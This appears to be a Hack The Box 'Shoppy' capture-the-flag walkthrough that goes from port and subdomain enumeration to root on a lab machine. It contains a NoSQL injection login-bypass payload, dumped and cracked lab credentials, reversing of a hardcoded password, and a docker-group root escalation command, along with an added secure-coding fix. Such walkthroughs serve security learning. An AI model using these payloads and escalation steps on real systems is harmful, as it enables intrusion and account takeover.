HTB-Shoppy
1. Overview of the approach
Directory enumeration during recon finds a /login page; log in to /login with a "universal password" (auth-bypass) payload, then use the same payload again to obtain the josh account (not an SSH account). Subdomain enumeration finds the mattermost subdomain; log in to the mattermost subdomain as josh and read the page to obtain an SSH account. Connect over SSH and run sudo -l, which shows an executable; reverse-engineer that executable to obtain the deploy account; escalate to root through docker.
2. Information gathering
nmap (use the following two steps: first scan all ports, then scan only the found ports for service and version information; this speeds up the scan)
┌──(root💀kali)-[~/Desktop]
└─# nmap -p- --min-rate 10000 10.129.92.247
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-31 04:15 EDT
Nmap scan report for 10.129.92.247
Host is up (0.33s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9093/tcp open copycat
Nmap done: 1 IP address (1 host up) scanned in 9.05 seconds
┌──(root💀kali)-[~/Desktop]
└─# nmap -p 22,80,9093 -sCV 10.129.92.247
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-31 04:24 EDT
Nmap scan report for 10.129.92.247
Host is up (0.32s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
| 256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
|_ 256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
80/tcp open http nginx 1.23.1
|_http-server-header: nginx/1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
9093/tcp open copycat?
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/plain; version=0.0.4; charset=utf-8
| Date: Fri, 31 Mar 2023 08:24:50 GMT
| HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
| TYPE go_gc_cycles_automatic_gc_cycles_total counter
| go_gc_cycles_automatic_gc_cycles_total 15
| HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
| TYPE go_gc_cycles_forced_gc_cycles_total counter
| go_gc_cycles_forced_gc_cycles_total 0
| HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
| TYPE go_gc_cycles_total_gc_cycles_total counter
| go_gc_cycles_total_gc_cycles_total 15
| HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
| TYPE go_gc_duration_seconds summary
| go_gc_duration_seconds{quantile="0"} 2.8824e-05
| go_gc_duration_seconds{quantile="0.25"} 7.6212e-05
| go_gc_d
| HTTPOptions:
| HTTP/1.0 200 OK
| Content-Type: text/plain; version=0.0.4; charset=utf-8
| Date: Fri, 31 Mar 2023 08:24:51 GMT
| HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
| TYPE go_gc_cycles_automatic_gc_cycles_total counter
| go_gc_cycles_automatic_gc_cycles_total 15
| HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
| TYPE go_gc_cycles_forced_gc_cycles_total counter
| go_gc_cycles_forced_gc_cycles_total 0
| HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
| TYPE go_gc_cycles_total_gc_cycles_total counter
| go_gc_cycles_total_gc_cycles_total 15
| HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
| TYPE go_gc_duration_seconds summary
| go_gc_duration_seconds{quantile="0"} 2.8824e-05
| go_gc_duration_seconds{quantile="0.25"} 7.6212e-05
|_ go_gc_d
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.77 seconds
Open ports: 22 (ssh), 80 (http), 9093 (copycat); the redirect reveals the domain shoppy.htb.
Add the domain to the local hosts file
echo "10.129.92.247 shoppy.htb" >> /etc/hosts
Open shoppy.htb in the browser

Enumerate subdirectories
┌──(root💀kali)-[~/Desktop]
└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -t 100 -mc 200,302,301 -u http://shoppy.htb/FUZZ
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://shoppy.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200,302,301
________________________________________________
[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 413ms]
* FUZZ: admin
[Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 414ms]
* FUZZ: images
[Status: 301, Size: 171, Words: 7, Lines: 11, Duration: 417ms]
* FUZZ: js
[Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 435ms]
* FUZZ: assets
[Status: 301, Size: 173, Words: 7, Lines: 11, Duration: 441ms]
* FUZZ: css
[Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 468ms]
* FUZZ: login
[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 323ms]
* FUZZ: Admin
[Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 429ms]
* FUZZ: Login
[Status: 301, Size: 177, Words: 7, Lines: 11, Duration: 335ms]
* FUZZ: fonts
[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 327ms]
* FUZZ: ADMIN
[Status: 301, Size: 181, Words: 7, Lines: 11, Duration: 332ms]
* FUZZ: exports
[Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 376ms]
* FUZZ:
[Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 330ms]
* FUZZ: LOGIN
:: Progress: [20116/20116] :: Job [1/1] :: 282 req/sec :: Duration: [0:01:06] :: Errors: 0 ::
Among the enumerated directories, the 301 pages contain nothing and the 302 pages all redirect to the /login directory.
3. Universal password
Visit shoppy.htb/login
Enter the following as the username with an arbitrary password (universal password); the login succeeds
admin'||'1==1

Click the search tab at the top right of the page and enter the universal password again; a Download export tab pops up.
Click the Download export tab to get two accounts, admin and josh

[{
"_id": "62db0e93d6d6a999a66ee67a",
"username": "admin",
"password": "23c6877d9e2b564ef8b32c3a23de27b2"
},
{
"_id": "62db0e93d6d6a999a66ee67b",
"username": "josh",
"password": "6ebcea65320589ca4f2f1ce039975995"
}]
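The bypass above works because the submitted username is spliced into a query expression that the database evaluates as code. The following is an added example, not Shoppy's actual source: it assumes the search handler builds a MongoDB-style $where string by concatenation, reproduces that behaviour against an in-memory user list, and shows the hardened form (an equality filter on type-checked input). All function names are hypothetical.

```javascript
// Added illustration, not the Shoppy application's code. The user list is
// constructed here; only the usernames come from the export on this page.
const users = [
  { username: 'admin', role: 'administrator' },
  { username: 'josh', role: 'user' },
];

// Vulnerable pattern (assumed): the untrusted username is spliced into a
// JavaScript expression that a MongoDB-style $where clause evaluates with
// `this` bound to each document.
function buildWhere(username) {
  return "this.username == '" + username + "'";
}

// Evaluates the expression once per document, the way $where would.
function runWhere(expr) {
  const predicate = new Function('return (' + expr + ');');
  return users.filter((doc) => Boolean(predicate.call(doc)));
}

function searchVulnerable(term) {
  return runWhere(buildWhere(term));
}

// Hardened version: never evaluate user input as code. Reject non-string
// input (blocks operator objects such as {$ne: ''}) and use a plain
// equality comparison, the equivalent of { username: term } in MongoDB.
function searchSafe(term) {
  if (typeof term !== 'string') {
    throw new TypeError('username must be a string');
  }
  return users.filter((doc) => doc.username === term);
}

// admin'||'1==1 turns the predicate into
//   this.username == 'admin' || '1==1'
// and the non-empty string '1==1' is truthy, so every document matches,
// which is why the export returned both accounts.
const payload = "admin'||'1==1";
console.log(searchVulnerable(payload).map((u) => u.username)); // [ 'admin', 'josh' ]
console.log(searchSafe(payload).map((u) => u.username));       // []
```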
Crack the hash at https://crackstation.net/
josh
remembermethisway
Logging in to SSH with this account does not work.
So use wfuzz to enumerate subdomains; many 301 responses come back
┌──(root💀kali)-[~/Desktop]
└─# wfuzz -u http://10.129.92.247 -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.129.92.247/
Total requests: 4989
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 301 7 L 11 W 169 Ch "www"
000000020: 301 7 L 11 W 169 Ch "www2"
000000019: 301 7 L 11 W 169 Ch "dev"
000000015: 301 7 L 11 W 169 Ch "ns"
000000003: 301 7 L 11 W 169 Ch "ftp"
000000021: 301 7 L 11 W 169 Ch "ns3"
000000022: 301 7 L 11 W 169 Ch "pop3"
000000018: 301 7 L 11 W 169 Ch "blog"
......
Then enumerate subdomains again with ffuf for speed (wfuzz is painfully slow here; use ffuf or gobuster), switch to a larger wordlist, and filter out the 301 responses
┌──(root💀kali)-[~/Desktop]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.129.92.247 -H "Host: FUZZ.shoppy.htb" -fc 301
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.92.247
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.shoppy.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response status: 301
________________________________________________
[Status: 200, Size: 3122, Words: 141, Lines: 1, Duration: 318ms]
* FUZZ: mattermost
:: Progress: [100000/100000] :: Job [1/1] :: 100 req/sec :: Duration: [0:13:49] :: Errors: 0 ::
The mattermost subdomain is found; add it to the local hosts file
echo "10.129.92.247 mattermost.shoppy.htb" >> /etc/hosts
Visit mattermost.shoppy.htb

Log in with the josh account obtained earlier; in the Deploy Machine channel on the left, the chat history reveals the jaeger account

username: jaeger
password: Sh0ppyBest@pp!
Connect over SSH (the IP changed because the target environment was restarted)
┌──(root💀kali)-[~/Desktop]
└─# ssh jaeger@10.129.93.16
jaeger@10.129.93.16's password:
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jaeger@shoppy:~$ id
uid=1000(jaeger) gid=1000(jaeger) groups=1000(jaeger)
jaeger@shoppy:~$ pwd
/home/jaeger
Use sudo -l to check this user's permissions
jaeger@shoppy:~$ sudo -l
[sudo] password for jaeger:
Matching Defaults entries for jaeger on shoppy:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jaeger may run the following commands on shoppy:
(deploy) /home/deploy/password-manager
The executable /home/deploy/password-manager can be run; download it to the local machine with the following steps.
Start an HTTP server in the SSH window
jaeger@shoppy:/home/deploy$ python3 -m http.server 9898
Serving HTTP on 0.0.0.0 port 9898 (http://0.0.0.0:9898/) ...
Then download it locally with the following command
wget http://10.129.93.16:9898/password-manager
Locally, inspect the file with the file command
┌──(root💀kali)-[~/Desktop]
└─# file password-manager
password-manager: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=400b2ed9d2b4121f9991060f343348080d2905d1, for GNU/Linux 3.2.0, not stripped
It is a 64-bit ELF (Executable and Linkable Format) file
4. Reverse analysis
Use the radare2 tool for static reverse analysis
Reference: https://blog.csdn.net/qq_28429161/article/details/107810534
r2 password-manager
Enter the following commands to locate the address of the main function
> aaa # auto-analyse the binary and name functions
> afl # list the functions in the program
Find main, then seek to the main function's address and view its assembly
> s main // seek to the entry of main
> pdf // print the disassembly of the current function
As shown in the figure above, int main() and the scope operator :: indicate that this is a C++ program. When run, it first prints Welcome to Josh password manager!, then prints Please enter your master password: and reads keyboard input, as shown in the figure below.
It then compares the keyboard input with Sample character by character.
If they match, it prints Access granted! Here is creds ! and then calls the system() function to run the cat command, which prints the contents of /home/deploy/creds.txt
Back in the target's SSH window, run the following command and enter Sample at the Please enter your master password: prompt
jaeger@shoppy:/home/deploy$ sudo -u deploy ./password-manager
[sudo] password for jaeger:
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!
The username and password of the deploy account are now known; run su deploy to switch to the deploy account

The deploy user belongs to the docker group; search for docker on the following site
https://gtfobins.github.io/
5. Docker privilege escalation
The following privilege-escalation command is shown

To get a more stable shell, replace the trailing sh with bash and run
deploy@shoppy:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt bash
Root privileges obtained

Over!
